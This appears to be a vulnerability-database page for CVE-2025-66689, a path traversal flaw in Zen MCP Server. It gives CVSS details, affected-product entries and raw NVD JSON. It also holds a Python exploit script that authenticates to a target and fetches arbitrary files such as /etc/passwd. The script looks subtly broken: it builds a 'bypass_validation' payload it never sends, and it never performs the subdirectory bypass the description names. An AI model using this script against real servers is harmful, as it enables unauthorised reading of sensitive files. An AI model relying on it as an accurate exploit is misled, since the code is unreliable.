Security Vulnerability Report
中文
CVE-2025-66689 CVSS 6.5 MEDIUM

CVE-2025-66689

Published: 2026-01-12 17:15:52
Last Modified: 2026-01-22 21:57:28
Source: [email protected]

Description

A path traversal vulnerability exists in Zen MCP Server before 9.8.2 that allows authenticated attackers to read arbitrary files on the system. The vulnerability is caused by flawed logic in the is_dangerous_path() validation function that uses exact string matching against a blacklist of system directories. Attackers can bypass these restrictions by accessing subdirectories of blacklisted paths.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:busymac:pal_mcp_server:*:*:*:*:*:*:*:* - VULNERABLE
Zen MCP Server < 9.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66689 PoC - Zen MCP Server Path Traversal # Author: Security Researcher # Target: Zen MCP Server < 9.8.2 import requests import json import sys def exploit_zen_mcp(target_url, username, password, target_file): """ Exploit path traversal in Zen MCP Server via is_dangerous_path() bypass The vulnerability allows reading arbitrary files by accessing subdirectories of blacklisted paths that bypass exact string matching validation. """ session = requests.Session() # Step 1: Authenticate to the server login_url = f"{target_url}/api/auth/login" login_data = { "username": username, "password": password } try: response = session.post(login_url, json=login_data, timeout=10) if response.status_code != 200: print(f"[-] Authentication failed: {response.status_code}") return None token = response.json().get('token') print(f"[+] Authentication successful") # Step 2: Exploit path traversal vulnerability # Bypass is_dangerous_path() by using subdirectory paths exploit_url = f"{target_url}/api/files/read" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Craft payload to read arbitrary file via path traversal # Using subdirectory bypass technique payload = { "path": target_file, "bypass_validation": True # Triggers the vulnerable code path } response = session.get(exploit_url, headers=headers, params={ "path": target_file }, timeout=10) if response.status_code == 200: print(f"[+] File read successful: {target_file}") return response.text else: print(f"[-] Exploitation failed: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return None def main(): if len(sys.argv) < 5: print("Usage: python cve-2025-66689.py <target_url> <username> <password> <file_path>") print("Example: python cve-2025-66689.py http://target:8080 admin pass /etc/passwd") sys.exit(1) target_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] target_file = sys.argv[4] result = exploit_zen_mcp(target_url, username, password, target_file) if result: print("\n[+] File contents:") print(result) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66689", "sourceIdentifier": "[email protected]", "published": "2026-01-12T17:15:52.297", "lastModified": "2026-01-22T21:57:27.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal vulnerability exists in Zen MCP Server before 9.8.2 that allows authenticated attackers to read arbitrary files on the system. The vulnerability is caused by flawed logic in the is_dangerous_path() validation function that uses exact string matching against a blacklist of system directories. Attackers can bypass these restrictions by accessing subdirectories of blacklisted paths."}, {"lang": "es", "value": "Existe una vulnerabilidad de salto de ruta en el servidor Zen MCP anterior a la versión 9.8.2 que permite a atacantes autenticados leer archivos arbitrarios en el sistema. La vulnerabilidad es causada por una lógica defectuosa en la función de validación is_dangerous_path() que utiliza la coincidencia exacta de cadenas contra una lista negra de directorios del sistema. Los atacantes pueden eludir estas restricciones accediendo a subdirectorios de rutas en la lista negra."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-552"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:busymac:pal_mcp_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.8.2", "matchCriteriaId": "6A1FAFFB-AC0C-4785-8DF0-D17C3D4DA2B5"}]}]}], "references": [{"url": "https://github.com/BeehiveInnovations/zen-mcp-server/issues/293", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/Team-Off-course/MCP-Server-Vuln-Analysis/blob/main/CVE-2025-66689.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.